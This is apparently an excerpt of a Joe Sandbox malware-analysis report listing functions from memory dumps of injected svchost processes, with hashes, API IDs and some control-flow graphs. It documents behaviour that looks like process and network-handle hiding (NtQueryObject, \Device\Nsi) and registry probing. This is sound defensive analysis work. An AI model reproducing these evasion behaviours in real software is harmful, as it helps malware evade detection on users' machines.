                                                                                Function 00000257E1078405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                                Function 00000257E10783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                                Function 00000257E10B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                                Function 00000257E10A14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                                Function 00000257E10B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                                Function 00000257E10A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                                Function 00000257E10A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                                Function 00000257E1079E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                                Function 00000257E10A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                                Function 00000257E10B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                                Function 00000257E10A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                                Function 00000257E1077356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                                Function 00000257E10773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                                Function 00000257E10A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                                Function 00000257E10A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90

                                                                                Executed Functions

                                                                                Function 000001F28C931268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8f8718106759883864cae2a8ca865240e286cea242c12ae6e8bb01d1b0de8f1e
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: F4E06DB5641E45C7EB048F62D8083AA3AE1FB8DF86F04C024C90907351DF7D8599C750
                                                                                Function 000001F28C93328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b4d9601b441b195fc890c788491207d0644a6a96c7f54882ecefb715d9f87218
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: B7118471AD0EC382FB60A731F8053F922D4B7543C5F98A1BCD90E87995EF79C0458200
                                                                                Function 000001F28C931ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                                  • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                                • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                                • SleepEx.KERNELBASE ref: 000001F28C931ADD
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: b67c1932e62b7ac0013a9a1692b6bd7ceba26b73bf7a76d8ab9135420b3866fa
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 81316871281EC292EB509B36DA512F963F5AB84BD4F0C74B1DE09876BAFF34C851C211
                                                                                Function 000001F28C933844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 62 1f28c933844-1f28c93384f 63 1f28c933869-1f28c933870 62->63 64 1f28c933851-1f28c933864 StrCmpNIW 62->64 64->63 65 1f28c933866 64->65 65->63
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 35bd7b7e84aeabd97046de9deeb150375f1cc12c8c169a2c29cf3a1cf66da4a6
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 3ED05E71391A8786FB149FA688C46B06390AB047C4F8C90B4CE0403550DB38C98E9610
                                                                                Function 000001F28C1D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700
                                                                                Function 000001F28C93CA0C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                                • Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
                                                                                • Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                                • Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620

                                                                                Non-executed Functions

                                                                                Function 000001F28C932B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 390 1f28c932b2c-1f28c932ba5 call 1f28c952ce0 393 1f28c932bab-1f28c932bb1 390->393 394 1f28c932ee0-1f28c932f03 390->394 393->394 395 1f28c932bb7-1f28c932bba 393->395 395->394 396 1f28c932bc0-1f28c932bc3 395->396 396->394 397 1f28c932bc9-1f28c932bd9 GetModuleHandleA 396->397 398 1f28c932bed 397->398 399 1f28c932bdb-1f28c932beb call 1f28c946090 397->399 401 1f28c932bf0-1f28c932c0e 398->401 399->401 401->394 404 1f28c932c14-1f28c932c33 StrCmpNIW 401->404 404->394 405 1f28c932c39-1f28c932c3d 404->405 405->394 406 1f28c932c43-1f28c932c4d 405->406 406->394 407 1f28c932c53-1f28c932c5a 406->407 407->394 408 1f28c932c60-1f28c932c73 407->408 409 1f28c932c75-1f28c932c81 408->409 410 1f28c932c83 408->410 411 1f28c932c86-1f28c932c8a 409->411 410->411 412 1f28c932c8c-1f28c932c98 411->412 413 1f28c932c9a 411->413 414 1f28c932c9d-1f28c932ca7 412->414 413->414 415 1f28c932d9d-1f28c932da1 414->415 416 1f28c932cad-1f28c932cb0 414->416 417 1f28c932ed2-1f28c932eda 415->417 418 1f28c932da7-1f28c932daa 415->418 419 1f28c932cc2-1f28c932ccc 416->419 420 1f28c932cb2-1f28c932cbf call 1f28c93199c 416->420 417->394 417->408 421 1f28c932dac-1f28c932db8 call 1f28c93199c 418->421 422 1f28c932dbb-1f28c932dc5 418->422 424 1f28c932d00-1f28c932d0a 419->424 425 1f28c932cce-1f28c932cdb 419->425 420->419 421->422 429 1f28c932df5-1f28c932df8 422->429 430 1f28c932dc7-1f28c932dd4 422->430 426 1f28c932d0c-1f28c932d19 424->426 427 1f28c932d3a-1f28c932d3d 424->427 425->424 432 1f28c932cdd-1f28c932cea 425->432 426->427 433 1f28c932d1b-1f28c932d28 426->433 434 1f28c932d4b-1f28c932d58 lstrlenW 427->434 435 1f28c932d3f-1f28c932d49 call 1f28c931bbc 427->435 438 1f28c932e05-1f28c932e12 lstrlenW 429->438 439 1f28c932dfa-1f28c932e03 call 1f28c931bbc 429->439 430->429 437 1f28c932dd6-1f28c932de3 430->437 440 1f28c932ced-1f28c932cf3 432->440 443 1f28c932d2b-1f28c932d31 433->443 445 1f28c932d7b-1f28c932d8d call 1f28c933844 434->445 446 1f28c932d5a-1f28c932d64 434->446 435->434 449 1f28c932d93-1f28c932d98 435->449 447 1f28c932de6-1f28c932dec 437->447 441 1f28c932e35-1f28c932e3f call 1f28c933844 438->441 442 1f28c932e14-1f28c932e1e 438->442 439->438 457 1f28c932e4a-1f28c932e55 439->457 440->449 450 1f28c932cf9-1f28c932cfe 440->450 452 1f28c932e42-1f28c932e44 441->452 442->441 451 1f28c932e20-1f28c932e33 call 1f28c93152c 442->451 443->449 453 1f28c932d33-1f28c932d38 443->453 445->449 445->452 446->445 456 1f28c932d66-1f28c932d79 call 1f28c93152c 446->456 447->457 458 1f28c932dee-1f28c932df3 447->458 449->452 450->424 450->440 451->441 451->457 452->417 452->457 453->427 453->443 456->445 456->449 464 1f28c932e57-1f28c932e5b 457->464 465 1f28c932ecc-1f28c932ed0 457->465 458->429 458->447 468 1f28c932e63-1f28c932e7d call 1f28c9385c0 464->468 469 1f28c932e5d-1f28c932e61 464->469 465->417 471 1f28c932e80-1f28c932e83 468->471 469->468 469->471 473 1f28c932e85-1f28c932ea3 call 1f28c9385c0 471->473 474 1f28c932ea6-1f28c932ea9 471->474 473->474 474->465 477 1f28c932eab-1f28c932ec9 call 1f28c9385c0 474->477 477->465
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 5ddfa2ae8d86f9d74b9217bdca104cd19bacd61b75c306f4a54b144b8a2605f5
